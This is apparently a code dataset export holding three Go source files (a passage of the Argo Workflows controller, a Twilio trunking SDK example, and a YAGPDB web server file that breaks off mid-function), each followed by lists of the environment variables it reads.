func (woc *wfOperationCtx) addArtifactToGlobalScope(art wfv1.Artifact) {
if art.GlobalName == "" {
return
}
globalArtName := fmt.Sprintf("workflow.outputs.artifacts.%s", art.GlobalName)
if woc.wf.Status.Outputs != nil {
for i, gArt := range woc.wf.Status.Outputs.Artifacts {
if gArt.Name == art.GlobalName {
// global output already exists. overwrite the value if different
art.Name = art.GlobalName
art.GlobalName = ""
art.Path = ""
if !reflect.DeepEqual(woc.wf.Status.Outputs.Artifacts[i], art) {
woc.wf.Status.Outputs.Artifacts[i] = art
woc.log.Infof("overwriting %s: %v", globalArtName, art)
woc.updated = true
}
return
}
}
} else {
woc.wf.Status.Outputs = &wfv1.Outputs{}
}
// global output does not yet exist
art.Name = art.GlobalName
art.GlobalName = ""
art.Path = ""
woc.log.Infof("setting %s: %v", globalArtName, art)
woc.wf.Status.Outputs.Artifacts = append(woc.wf.Status.Outputs.Artifacts, art)
woc.updated = true
}
// addChildNode adds a nodeID as a child to a parent
// parent and child are both node names
func (woc *wfOperationCtx) addChildNode(parent string, child string) {
parentID := woc.wf.NodeID(parent)
childID := woc.wf.NodeID(child)
node, ok := woc.wf.Status.Nodes[parentID]
if !ok {
panic(fmt.Sprintf("parent node %s not initialized", parent))
}
for _, nodeID := range node.Children {
if childID == nodeID {
// already exists
return
}
}
node.Children = append(node.Children, childID)
woc.wf.Status.Nodes[parentID] = node
woc.updated = true
}
// executeResource runs a kubectl command against a manifest
func (woc *wfOperationCtx) executeResource(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
tmpl = tmpl.DeepCopy()
if tmpl.Resource.SetOwnerReference {
obj := unstructured.Unstructured{}
err := yaml.Unmarshal([]byte(tmpl.Resource.Manifest), &obj)
if err != nil {
return node, err
}
ownerReferences := obj.GetOwnerReferences()
obj.SetOwnerReferences(append(ownerReferences, *metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind))))
bytes, err := yaml.Marshal(obj.Object)
if err != nil {
return node, err
}
tmpl.Resource.Manifest = string(bytes)
}
mainCtr := woc.newExecContainer(common.MainContainerName, tmpl)
mainCtr.Command = []string{"argoexec", "resource", tmpl.Resource.Action}
_, err := woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*mainCtr}, tmpl, &createWorkflowPodOpts{onExitPod: opts.onExitTemplate, executionDeadline: opts.executionDeadline})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) executeData(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
dataTemplate, err := json.Marshal(tmpl.Data)
if err != nil {
return node, fmt.Errorf("could not marshal data in transformation: %w", err)
}
mainCtr := woc.newExecContainer(common.MainContainerName, tmpl)
mainCtr.Command = []string{"argoexec", "data", string(dataTemplate)}
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*mainCtr}, tmpl, &createWorkflowPodOpts{onExitPod: opts.onExitTemplate, executionDeadline: opts.executionDeadline, includeScriptOutput: true})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, nil
}
func (woc *wfOperationCtx) executeSuspend(nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypeSuspend, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
}
woc.log.Infof("node %s suspended", nodeName)
// If there is either an active workflow deadline, or if this node is suspended with a duration, then the workflow
// will need to be requeued after a certain amount of time
var requeueTime *time.Time
if tmpl.Suspend.Duration != "" {
node := woc.wf.GetNodeByName(nodeName)
suspendDuration, err := parseStringToDuration(tmpl.Suspend.Duration)
if err != nil {
return node, err
}
suspendDeadline := node.StartedAt.Add(suspendDuration)
requeueTime = &suspendDeadline
if time.Now().UTC().After(suspendDeadline) {
// Suspension is expired, node can be resumed
woc.log.Infof("auto resuming node %s", nodeName)
_ = woc.markNodePhase(nodeName, wfv1.NodeSucceeded)
return node, nil
}
}
// workflowDeadline is the time when the workflow will be timed out, if any
if workflowDeadline := woc.getWorkflowDeadline(); workflowDeadline != nil {
// There is an active workflow deadline. If this node is suspended with a duration, choose the earlier time
// between the two, otherwise choose the deadline time.
if requeueTime == nil || workflowDeadline.Before(*requeueTime) {
requeueTime = workflowDeadline
}
}
if requeueTime != nil {
woc.requeueAfter(time.Until(*requeueTime))
}
_ = woc.markNodePhase(nodeName, wfv1.NodeRunning)
return node, nil
}
func addRawOutputFields(node *wfv1.NodeStatus, tmpl *wfv1.Template) *wfv1.NodeStatus {
if tmpl.GetType() != wfv1.TemplateTypeSuspend || node.Type != wfv1.NodeTypeSuspend {
panic("addRawOutputFields should only be used for nodes and templates of type suspend")
}
for _, param := range tmpl.Outputs.Parameters {
if param.ValueFrom.Supplied != nil {
if node.Outputs == nil {
node.Outputs = &wfv1.Outputs{Parameters: []wfv1.Parameter{}}
}
node.Outputs.Parameters = append(node.Outputs.Parameters, param)
}
}
return node
}
func parseStringToDuration(durationString string) (time.Duration, error) {
var suspendDuration time.Duration
// If no units are attached, treat as seconds
if val, err := strconv.Atoi(durationString); err == nil {
suspendDuration = time.Duration(val) * time.Second
} else if duration, err := time.ParseDuration(durationString); err == nil {
suspendDuration = duration
} else {
return 0, fmt.Errorf("unable to parse %s as a duration: %w", durationString, err)
}
return suspendDuration, nil
}
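// exampleParseStringToDuration is an illustrative sketch only (not called by the controller)
// showing that unitless values are treated as seconds while Go duration strings are parsed
// as-is; the inputs are assumptions for demonstration purposes.
func exampleParseStringToDuration() {
	d1, _ := parseStringToDuration("30")    // 30s
	d2, _ := parseStringToDuration("2h45m") // 2h45m0s
	fmt.Println(d1, d2)
}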
func processItem(tmpl template.Template, name string, index int, item wfv1.Item, obj interface{}) (string, error) {
replaceMap := make(map[string]string)
var newName string
switch item.GetType() {
case wfv1.String, wfv1.Number, wfv1.Bool:
replaceMap["item"] = fmt.Sprintf("%v", item)
newName = generateNodeName(name, index, item)
case wfv1.Map:
// Handle the case when withItems is a list of maps.
// vals holds stringified versions of the map items which are incorporated as part of the step name.
// For example if the item is: {"name": "jesse","group":"developer"}
// the vals would be: ["name:jesse", "group:developer"]
// This would eventually be part of the step name (group:developer,name:jesse)
vals := make([]string, 0)
mapVal := item.GetMapVal()
for itemKey, itemVal := range mapVal {
replaceMap[fmt.Sprintf("item.%s", itemKey)] = fmt.Sprintf("%v", itemVal)
vals = append(vals, fmt.Sprintf("%s:%v", itemKey, itemVal))
}
jsonByteVal, err := json.Marshal(mapVal)
if err != nil {
return "", errors.InternalWrapError(err)
}
replaceMap["item"] = string(jsonByteVal)
// sort the values so that the name is deterministic
sort.Strings(vals)
newName = generateNodeName(name, index, strings.Join(vals, ","))
case wfv1.List:
listVal := item.GetListVal()
byteVal, err := json.Marshal(listVal)
if err != nil {
return "", errors.InternalWrapError(err)
}
replaceMap["item"] = string(byteVal)
newName = generateNodeName(name, index, listVal)
default:
return "", errors.Errorf(errors.CodeBadRequest, "withItems[%d] expected string, number, list, or map. received: %v", index, item)
}
newStepStr, err := tmpl.Replace(replaceMap, false)
if err != nil {
return "", err
}
err = json.Unmarshal([]byte(newStepStr), &obj)
if err != nil {
return "", errors.InternalWrapError(err)
}
return newName, nil
}
func generateNodeName(name string, index int, desc interface{}) string {
// Do not display parentheses in node name. Nodes are still guaranteed to be unique due to the index number
replacer := strings.NewReplacer("(", "", ")", "")
cleanName := replacer.Replace(fmt.Sprint(desc))
newName := fmt.Sprintf("%s(%d:%v)", name, index, cleanName)
if out := util.RecoverIndexFromNodeName(newName); out != index {
panic(fmt.Sprintf("unrecoverable digit in generateName; wanted '%d' and got '%d'", index, out))
}
return newName
}
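// exampleGenerateNodeName is an illustrative sketch only (not called by the controller)
// showing the child-node naming scheme for an expanded withItems entry; the inputs are
// assumptions for demonstration purposes.
func exampleGenerateNodeName() {
	fmt.Println(generateNodeName("fanout", 0, "jesse")) // fanout(0:jesse)
}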
func expandSequence(seq *wfv1.Sequence) ([]wfv1.Item, error) {
var start, end int
var err error
if seq.Start != nil {
start, err = strconv.Atoi(seq.Start.String())
if err != nil {
return nil, err
}
}
if seq.End != nil {
end, err = strconv.Atoi(seq.End.String())
if err != nil {
return nil, err
}
} else if seq.Count != nil {
count, err := strconv.Atoi(seq.Count.String())
if err != nil {
return nil, err
}
if count == 0 {
return []wfv1.Item{}, nil
}
end = start + count - 1
} else {
return nil, errors.InternalError("neither end nor count was specified in withSequence")
}
items := make([]wfv1.Item, 0)
format := "%d"
if seq.Format != "" {
format = seq.Format
}
if start <= end {
for i := start; i <= end; i++ {
item, err := wfv1.ParseItem(`"` + fmt.Sprintf(format, i) + `"`)
if err != nil {
return nil, err
}
items = append(items, item)
}
} else {
for i := start; i >= end; i-- {
item, err := wfv1.ParseItem(`"` + fmt.Sprintf(format, i) + `"`)
if err != nil {
return nil, err
}
items = append(items, item)
}
}
return items, nil
}
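// substituteParamsInVolumes substitutes the given parameters into the workflow's volume definitions.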
func (woc *wfOperationCtx) substituteParamsInVolumes(params map[string]string) error {
if woc.volumes == nil {
return nil
}
volumes := woc.volumes
volumesBytes, err := json.Marshal(volumes)
if err != nil {
return errors.InternalWrapError(err)
}
newVolumesStr, err := template.Replace(string(volumesBytes), params, true)
if err != nil {
return err
}
var newVolumes []apiv1.Volume
err = json.Unmarshal([]byte(newVolumesStr), &newVolumes)
if err != nil {
return errors.InternalWrapError(err)
}
woc.volumes = newVolumes
return nil
}
// createTemplateContext creates a new template context.
func (woc *wfOperationCtx) createTemplateContext(scope wfv1.ResourceScope, resourceName string) (*templateresolution.Context, error) {
var clusterWorkflowTemplateGetter templateresolution.ClusterWorkflowTemplateGetter
if woc.controller.cwftmplInformer != nil {
clusterWorkflowTemplateGetter = woc.controller.cwftmplInformer.Lister()
} else {
clusterWorkflowTemplateGetter = &templateresolution.NullClusterWorkflowTemplateGetter{}
}
ctx := templateresolution.NewContext(woc.controller.wftmplInformer.Lister().WorkflowTemplates(woc.wf.Namespace), clusterWorkflowTemplateGetter, woc.execWf, woc.wf)
switch scope {
case wfv1.ResourceScopeNamespaced:
return ctx.WithWorkflowTemplate(resourceName)
case wfv1.ResourceScopeCluster:
return ctx.WithClusterWorkflowTemplate(resourceName)
default:
return ctx, nil
}
}
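// computeMetrics emits the custom Prometheus metrics in metricList, substituting variables from
// localScope (and realTimeScope for realtime gauges). When realTimeOnly is true, non-realtime
// metrics are skipped.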
func (woc *wfOperationCtx) computeMetrics(metricList []*wfv1.Prometheus, localScope map[string]string, realTimeScope map[string]func() float64, realTimeOnly bool) {
for _, metricTmpl := range metricList {
// Don't process real time metrics after execution
if realTimeOnly && !metricTmpl.IsRealtime() {
continue
}
if metricTmpl.Help == "" {
woc.reportMetricEmissionError(fmt.Sprintf("metric '%s' must contain a help string under 'help: ' field", metricTmpl.Name))
continue
}
		// Substitute parameters in non-value fields of the template to support variables in places such as labels,
		// name, and help. We do not substitute value fields (i.e. gauge, histogram, counter) here because they
		// might be realtime ({{workflow.duration}} is substituted differently depending on whether the metric is realtime).
metricTmplBytes, err := json.Marshal(metricTmpl)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s' (marshal): %s", metricTmpl.Name, err))
continue
}
replacedValue, err := template.Replace(string(metricTmplBytes), localScope, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s': %s", metricTmpl.Name, err))
continue
}
var metricTmplSubstituted wfv1.Prometheus
err = json.Unmarshal([]byte(replacedValue), &metricTmplSubstituted)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s' (unmarshal): %s", metricTmpl.Name, err))
continue
}
// Only substitute non-value fields here. Value field substitution happens below
metricTmpl.Name = metricTmplSubstituted.Name
metricTmpl.Help = metricTmplSubstituted.Help
metricTmpl.Labels = metricTmplSubstituted.Labels
metricTmpl.When = metricTmplSubstituted.When
proceed, err := shouldExecute(metricTmpl.When)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to compute 'when' clause for metric '%s': %s", woc.wf.ObjectMeta.Name, err))
continue
}
if !proceed {
continue
}
if metricTmpl.IsRealtime() {
// Finally substitute value parameters
value := metricTmpl.Gauge.Value
if !(strings.HasPrefix(value, "{{") && strings.HasSuffix(value, "}}")) {
woc.reportMetricEmissionError("real time metrics can only be used with metric variables")
continue
}
value = strings.TrimSuffix(strings.TrimPrefix(value, "{{"), "}}")
valueFunc, ok := realTimeScope[value]
if !ok {
woc.reportMetricEmissionError(fmt.Sprintf("'%s' is not available as a real time metric", value))
continue
}
updatedMetric, err := metrics.ConstructRealTimeGaugeMetric(metricTmpl, valueFunc)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricTmpl.Name, err))
continue
}
err = woc.controller.metrics.UpsertCustomMetric(metricTmpl.GetDesc(), string(woc.wf.UID), updatedMetric, true)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricTmpl.Name, err))
continue
}
continue
} else {
metricSpec := metricTmpl.DeepCopy()
// Finally substitute value parameters
replacedValue, err := template.Replace(metricSpec.GetValueString(), localScope, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s': %s", metricSpec.Name, err))
continue
}
metricSpec.SetValueString(replacedValue)
metric := woc.controller.metrics.GetCustomMetric(metricSpec.GetDesc())
// It is valid to pass a nil metric to ConstructOrUpdateMetric, in that case the metric will be created for us
updatedMetric, err := metrics.ConstructOrUpdateMetric(metric, metricSpec)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricSpec.Name, err))
continue
}
err = woc.controller.metrics.UpsertCustomMetric(metricSpec.GetDesc(), string(woc.wf.UID), updatedMetric, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricSpec.Name, err))
continue
}
continue
}
}
}
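// reportMetricEmissionError records a metric emission error as a workflow condition and logs it.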
func (woc *wfOperationCtx) reportMetricEmissionError(errorString string) {
woc.wf.Status.Conditions.UpsertConditionMessage(
wfv1.Condition{
Status: metav1.ConditionTrue,
Type: wfv1.ConditionTypeMetricsError,
Message: errorString,
})
woc.updated = true
woc.log.Error(errorString)
}
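// createPDBResource creates the PodDisruptionBudget defined in the workflow spec for this
// workflow's pods, unless one already exists.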
func (woc *wfOperationCtx) createPDBResource(ctx context.Context) error {
if woc.execWf.Spec.PodDisruptionBudget == nil {
return nil
}
pdb, err := woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Get(
ctx,
woc.wf.Name,
metav1.GetOptions{},
)
if err != nil && !apierr.IsNotFound(err) {
return err
}
if pdb != nil && pdb.Name != "" {
return nil
}
pdbSpec := *woc.execWf.Spec.PodDisruptionBudget
if pdbSpec.Selector == nil {
pdbSpec.Selector = &metav1.LabelSelector{
MatchLabels: map[string]string{common.LabelKeyWorkflow: woc.wf.Name},
}
}
newPDB := policyv1beta.PodDisruptionBudget{
ObjectMeta: metav1.ObjectMeta{
Name: woc.wf.Name,
Labels: map[string]string{common.LabelKeyWorkflow: woc.wf.Name},
OwnerReferences: []metav1.OwnerReference{
*metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind)),
},
},
Spec: pdbSpec,
}
_, err = woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Create(ctx, &newPDB, metav1.CreateOptions{})
if err != nil {
return err
}
woc.log.Infof("Created PDB resource for workflow.")
woc.updated = true
return nil
}
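// deletePDBResource deletes the workflow's PodDisruptionBudget, retrying on transient errors.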
func (woc *wfOperationCtx) deletePDBResource(ctx context.Context) error {
if woc.execWf.Spec.PodDisruptionBudget == nil {
return nil
}
err := waitutil.Backoff(retry.DefaultRetry, func() (bool, error) {
err := woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Delete(ctx, woc.wf.Name, metav1.DeleteOptions{})
if apierr.IsNotFound(err) {
return true, nil
}
return !errorsutil.IsTransientErr(err), err
})
if err != nil {
woc.log.WithField("err", err).Error("Unable to delete PDB resource for workflow.")
return err
}
woc.log.Infof("Deleted PDB resource for workflow.")
return nil
}
// Check if the output of this node is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
func (woc *wfOperationCtx) includeScriptOutput(nodeName, boundaryID string) (bool, error) {
if boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]; ok {
tmplCtx, err := woc.createTemplateContext(boundaryNode.GetTemplateScope())
if err != nil {
return false, err
}
_, parentTemplate, templateStored, err := tmplCtx.ResolveTemplate(&boundaryNode)
if err != nil {
return false, err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
name := getStepOrDAGTaskName(nodeName)
return hasOutputResultRef(name, parentTemplate), nil
}
return false, nil
}
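// fetchWorkflowSpec resolves the WorkflowTemplate or ClusterWorkflowTemplate referenced by
// spec.workflowTemplateRef.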
func (woc *wfOperationCtx) fetchWorkflowSpec() (wfv1.WorkflowSpecHolder, error) {
if woc.wf.Spec.WorkflowTemplateRef == nil {
return nil, fmt.Errorf("cannot fetch workflow spec without workflowTemplateRef")
}
var specHolder wfv1.WorkflowSpecHolder
var err error
	// Resolve the WorkflowTemplate or ClusterWorkflowTemplate referenced by the workflow
if woc.wf.Spec.WorkflowTemplateRef.ClusterScope {
specHolder, err = woc.controller.cwftmplInformer.Lister().Get(woc.wf.Spec.WorkflowTemplateRef.Name)
} else {
specHolder, err = woc.controller.wftmplInformer.Lister().WorkflowTemplates(woc.wf.Namespace).Get(woc.wf.Spec.WorkflowTemplateRef.Name)
}
if err != nil {
return nil, err
}
return specHolder, nil
}
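// retryStrategy returns the template's retry strategy if set, otherwise the workflow-level default.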
func (woc *wfOperationCtx) retryStrategy(tmpl *wfv1.Template) *wfv1.RetryStrategy {
if tmpl != nil && tmpl.RetryStrategy != nil {
return tmpl.RetryStrategy
}
return woc.execWf.Spec.RetryStrategy
}
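// setExecWorkflow populates woc.execWf, the spec that is actually executed: either the stored spec
// resolved from workflowTemplateRef or the workflow's own spec with controller defaults applied.
// It also performs one-time validation and substitutes global variables.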
func (woc *wfOperationCtx) setExecWorkflow(ctx context.Context) error {
if woc.wf.Spec.WorkflowTemplateRef != nil {
err := woc.setStoredWfSpec()
if err != nil {
woc.markWorkflowError(ctx, err)
return err
}
woc.execWf = &wfv1.Workflow{Spec: *woc.wf.Status.StoredWorkflowSpec.DeepCopy()}
woc.volumes = woc.execWf.Spec.DeepCopy().Volumes
} else if woc.controller.Config.WorkflowRestrictions.MustUseReference() {
err := fmt.Errorf("workflows must use workflowTemplateRef to be executed when the controller is in reference mode")
woc.markWorkflowError(ctx, err)
return err
} else {
err := woc.controller.setWorkflowDefaults(woc.wf)
if err != nil {
woc.markWorkflowError(ctx, err)
return err
}
woc.volumes = woc.wf.Spec.DeepCopy().Volumes
}
// Perform one-time workflow validation
if woc.wf.Status.Phase == wfv1.WorkflowUnknown {
validateOpts := validate.ValidateOpts{ContainerRuntimeExecutor: woc.getContainerRuntimeExecutor()}
wftmplGetter := templateresolution.WrapWorkflowTemplateInterface(woc.controller.wfclientset.ArgoprojV1alpha1().WorkflowTemplates(woc.wf.Namespace))
cwftmplGetter := templateresolution.WrapClusterWorkflowTemplateInterface(woc.controller.wfclientset.ArgoprojV1alpha1().ClusterWorkflowTemplates())
// Validate the execution wfSpec
wfConditions, err := validate.ValidateWorkflow(wftmplGetter, cwftmplGetter, woc.wf, validateOpts)
if err != nil {
msg := fmt.Sprintf("invalid spec: %s", err.Error())
woc.markWorkflowFailed(ctx, msg)
return err
}
// If we received conditions during validation (such as SpecWarnings), add them to the Workflow object
if len(*wfConditions) > 0 {
woc.wf.Status.Conditions.JoinConditions(wfConditions)
woc.updated = true
}
}
woc.setGlobalParameters(woc.execWf.Spec.Arguments)
err := woc.substituteGlobalVariables()
if err != nil {
return err
}
return nil
}
func (woc *wfOperationCtx) GetShutdownStrategy() wfv1.ShutdownStrategy {
return woc.execWf.Spec.Shutdown
}
func (woc *wfOperationCtx) ShouldSuspend() bool {
return woc.execWf.Spec.Suspend != nil && *woc.execWf.Spec.Suspend
}
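// needsStoredWfSpecUpdate reports whether wf.Status.StoredWorkflowSpec must be (re)computed from
// the referenced template.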
func (woc *wfOperationCtx) needsStoredWfSpecUpdate() bool {
	// The woc.wf.Status.StoredWorkflowSpec.Entrypoint == "" check mainly supports backward compatibility when upgrading
	// 2.11.x workflows to 2.12.x, where StoredWorkflowSpec needs to be recalculated in the 2.12.x format.
	// This check can be removed once all users have migrated from 2.11.x to 2.12.x.
return woc.wf.Status.StoredWorkflowSpec == nil || (woc.wf.Spec.Entrypoint != "" && woc.wf.Status.StoredWorkflowSpec.Entrypoint == "") ||
(woc.wf.Spec.Suspend != woc.wf.Status.StoredWorkflowSpec.Suspend) ||
(woc.wf.Spec.Shutdown != woc.wf.Status.StoredWorkflowSpec.Shutdown)
}
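// setStoredWfSpec merges the referenced template spec with controller workflow defaults into
// wf.Status.StoredWorkflowSpec, or, when spec changes are forbidden, verifies that the merged
// spec has not changed.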
func (woc *wfOperationCtx) setStoredWfSpec() error {
wfDefault := woc.controller.Config.WorkflowDefaults
if wfDefault == nil {
wfDefault = &wfv1.Workflow{}
}
if woc.needsStoredWfSpecUpdate() {
wftHolder, err := woc.fetchWorkflowSpec()
if err != nil {
return err
}
// Join WFT and WfDefault metadata to Workflow metadata.
wfutil.JoinWorkflowMetaData(&woc.wf.ObjectMeta, wftHolder.GetWorkflowMetadata(), &wfDefault.ObjectMeta)
		// Join the workflow spec, the referenced workflow template spec, and the workflow default spec.
mergedWf, err := wfutil.JoinWorkflowSpec(&woc.wf.Spec, wftHolder.GetWorkflowSpec(), &wfDefault.Spec)
if err != nil {
return err
}
woc.wf.Status.StoredWorkflowSpec = &mergedWf.Spec
woc.updated = true
} else if woc.controller.Config.WorkflowRestrictions.MustNotChangeSpec() {
wftHolder, err := woc.fetchWorkflowSpec()
if err != nil {
return err
}
mergedWf, err := wfutil.JoinWorkflowSpec(&woc.wf.Spec, wftHolder.GetWorkflowSpec(), &wfDefault.Spec)
if err != nil {
return err
}
if mergedWf.Spec.String() != woc.wf.Status.StoredWorkflowSpec.String() {
return fmt.Errorf("workflowTemplateRef reference may not change during execution when the controller is in reference mode")
}
}
return nil
}
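// mergedTemplateDefaultsInto applies spec.templateDefaults onto originalTmpl via a strategic merge
// patch, preserving the template's original type.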
func (woc *wfOperationCtx) mergedTemplateDefaultsInto(originalTmpl *wfv1.Template) error {
if woc.execWf.Spec.TemplateDefaults != nil {
originalTmplType := originalTmpl.GetType()
tmplDefaultsJson, err := json.Marshal(woc.execWf.Spec.TemplateDefaults)
if err != nil {
return err
}
targetTmplJson, err := json.Marshal(originalTmpl)
if err != nil {
return err
}
resultTmpl, err := strategicpatch.StrategicMergePatch(tmplDefaultsJson, targetTmplJson, wfv1.Template{})
if err != nil {
return err
}
err = json.Unmarshal(resultTmpl, originalTmpl)
if err != nil {
return err
}
originalTmpl.SetType(originalTmplType)
}
return nil
}
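// substituteGlobalVariables resolves global parameter references in the executed workflow spec
// using woc.globalParams.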
func (woc *wfOperationCtx) substituteGlobalVariables() error {
wfSpec, err := json.Marshal(woc.execWf.Spec)
if err != nil {
return err
}
resolveSpec, err := template.Replace(string(wfSpec), woc.globalParams, true)
if err != nil {
return err
}
err = json.Unmarshal([]byte(resolveSpec), &woc.execWf.Spec)
if err != nil {
return err
}
return nil
}
|
[
"\"BUBBLE_ENTRY_TEMPLATE_ERR\"",
"\"INFORMER_WRITE_BACK\""
] |
[] |
[
"INFORMER_WRITE_BACK",
"BUBBLE_ENTRY_TEMPLATE_ERR"
] |
[]
|
["INFORMER_WRITE_BACK", "BUBBLE_ENTRY_TEMPLATE_ERR"]
|
go
| 2 | 0 | |
examples/service/trunking/ip_access_control_list/fetch/ip_access_control_list_fetch_example.go
|
package main
import (
"log"
"os"
"github.com/RJPearson94/twilio-sdk-go"
v1 "github.com/RJPearson94/twilio-sdk-go/service/trunking/v1"
"github.com/RJPearson94/twilio-sdk-go/session/credentials"
)
var trunkingClient *v1.Trunking
func init() {
creds, err := credentials.New(credentials.Account{
Sid: os.Getenv("TWILIO_ACCOUNT_SID"),
AuthToken: os.Getenv("TWILIO_AUTH_TOKEN"),
})
if err != nil {
log.Panicf("%s", err.Error())
}
trunkingClient = twilio.NewWithCredentials(creds).Trunking.V1
}
func main() {
resp, err := trunkingClient.
Trunk("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
IpAccessControlList("ALXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Fetch()
if err != nil {
log.Panicf("%s", err.Error())
}
log.Printf("SID: %s", resp.Sid)
}
|
[
"\"TWILIO_ACCOUNT_SID\"",
"\"TWILIO_AUTH_TOKEN\""
] |
[] |
[
"TWILIO_AUTH_TOKEN",
"TWILIO_ACCOUNT_SID"
] |
[]
|
["TWILIO_AUTH_TOKEN", "TWILIO_ACCOUNT_SID"]
|
go
| 2 | 0 | |
web/web.go
|
package web
import (
"crypto/tls"
"flag"
"github.com/NYTimes/gziphandler"
"github.com/golang/crypto/acme/autocert"
"github.com/jonas747/discordgo"
"github.com/jonas747/yagpdb/bot/botrest"
"github.com/jonas747/yagpdb/common"
"github.com/jonas747/yagpdb/common/patreon"
yagtmpl "github.com/jonas747/yagpdb/common/templates"
"github.com/jonas747/yagpdb/web/discordblog"
"github.com/natefinch/lumberjack"
log "github.com/sirupsen/logrus"
"goji.io"
"goji.io/pat"
"html/template"
"net/http"
"os"
"strconv"
"strings"
"sync/atomic"
"time"
)
var (
// Core template files
Templates *template.Template
Debug = true // Turns on debug mode
ListenAddressHTTP = ":5000"
ListenAddressHTTPS = ":5001"
// Muxers
RootMux *goji.Mux
CPMux *goji.Mux
ServerPublicMux *goji.Mux
ServerPubliAPIMux *goji.Mux
properAddresses bool
https bool
acceptingRequests *int32
globalTemplateData = TemplateData(make(map[string]interface{}))
StartedAt = time.Now()
CurrentAd *Advertisement
)
type Advertisement struct {
Path template.URL
VideoUrls []template.URL
VideoTypes []string
LinkURL template.URL
Width int
Height int
}
func init() {
b := int32(1)
acceptingRequests = &b
Templates = template.New("")
Templates = Templates.Funcs(template.FuncMap{
"mTemplate": mTemplate,
"hasPerm": hasPerm,
"formatTime": prettyTime,
"roleOptions": tmplRoleDropdown,
"roleOptionsMulti": tmplRoleDropdownMutli,
"textChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildText, "#"),
"textChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildText, "#"),
"voiceChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildVoice, ""),
"voiceChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildVoice, ""),
"catChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildCategory, ""),
"catChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildCategory, ""),
})
Templates = Templates.Funcs(yagtmpl.StandardFuncMap)
flag.BoolVar(&properAddresses, "pa", false, "Sets the listen addresses to 80 and 443")
flag.BoolVar(&https, "https", true, "Serve web on HTTPS. Only disable when using an HTTPS reverse proxy.")
}
func LoadTemplates() {
Templates = template.Must(Templates.ParseFiles("templates/index.html", "templates/cp_main.html", "templates/cp_nav.html", "templates/cp_selectserver.html", "templates/cp_logs.html", "templates/status.html"))
}
func Run() {
LoadTemplates()
AddGlobalTemplateData("ClientID", common.Conf.ClientID)
AddGlobalTemplateData("Host", common.Conf.Host)
AddGlobalTemplateData("Version", common.VERSION)
AddGlobalTemplateData("Testing", common.Testing)
if properAddresses {
ListenAddressHTTP = ":80"
ListenAddressHTTPS = ":443"
}
patreon.Run()
InitOauth()
mux := setupRoutes()
// Start monitoring the bot
go botrest.RunPinger()
blogChannel := os.Getenv("YAGPDB_ANNOUNCEMENTS_CHANNEL")
parsedBlogChannel, _ := strconv.ParseInt(blogChannel, 10, 64)
if parsedBlogChannel != 0 {
go discordblog.RunPoller(common.BotSession, parsedBlogChannel, time.Minute)
}
LoadAd()
log.Info("Running webservers")
runServers(mux)
}
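// LoadAd reads the current advertisement configuration from the YAGPDB_AD_* environment variables.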
func LoadAd() {
path := os.Getenv("YAGPDB_AD_IMG_PATH")
linkurl := os.Getenv("YAGPDB_AD_LINK")
width, _ := strconv.Atoi(os.Getenv("YAGPDB_AD_W"))
height, _ := strconv.Atoi(os.Getenv("YAGPDB_AD_H"))
CurrentAd = &Advertisement{
Path: template.URL(path),
LinkURL: template.URL(linkurl),
Width: width,
Height: height,
}
videos := strings.Split(os.Getenv("YAGPDB_AD_VIDEO_PATHS"), ",")
for _, v := range videos {
if v == "" {
continue
}
CurrentAd.VideoUrls = append(CurrentAd.VideoUrls, template.URL(v))
